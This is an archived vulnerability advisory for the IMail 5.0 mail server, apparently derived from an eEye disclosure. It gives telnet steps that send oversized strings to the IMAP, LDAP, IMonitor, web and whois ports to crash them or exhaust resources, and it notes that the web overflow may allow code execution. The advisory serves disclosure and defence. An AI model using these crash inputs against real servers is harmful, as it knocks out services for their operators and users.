TUCoPS :: Unix :: General
:: imail2.htm
Multiple IMail 5.0 Vulnerabilites
Vulnerability
Multiple IMail Vulnerabilites
Affected
IMail 5.0
Description
Following is based on eEye Digital Security Team Advisory. The
following holes can be used as a Denial of Service against the
various services mentioned and in some cases used to remotely
execute code.
Imapd (143)
===========
The imapd login process does not do proper bounds checking on
usernames and passwords.
* OK IMAP4 Server (IMail 4.06)
X LOGIN glob1 glob2
Where glob1 is 1200 characters and glob2 is 1300 characters. The
imapd service will crash with the usuall overflow error.
LDAP (389)
==========
Telnet to server.com 389
Send: Y glob1
hit enter twice
Server Returns: 0
Send: Y glob2
hit enter
Where glob1 and glob2 are 2375 characters and Y is Y. The ldap
service goes to 90 percent or so and idles there. Therefore using
up most system resources.
IMonitor (8181)
===============
Telnet to server.com 8181
Send: glob1
hit enter twice
Where glob1 is 2045 characters. The IMonitor service crashes with
the normal overflow message.
IMail Web Service (8383)
========================
Telnet to server.com 8383
Send: GET /glob1/
Where glob1 is 3000 characters. The usual overflow message will
be displayed. This one looks to be easily exploitable.
Whois32 Daemon (43)
===================
Telnet to server.com 43
Send glob1
Where glob1 is 1000 characters. The usual overflow message will
be displayed. Ya... starting to sound old.
Solution
Vendor has been notified, Waiting for response...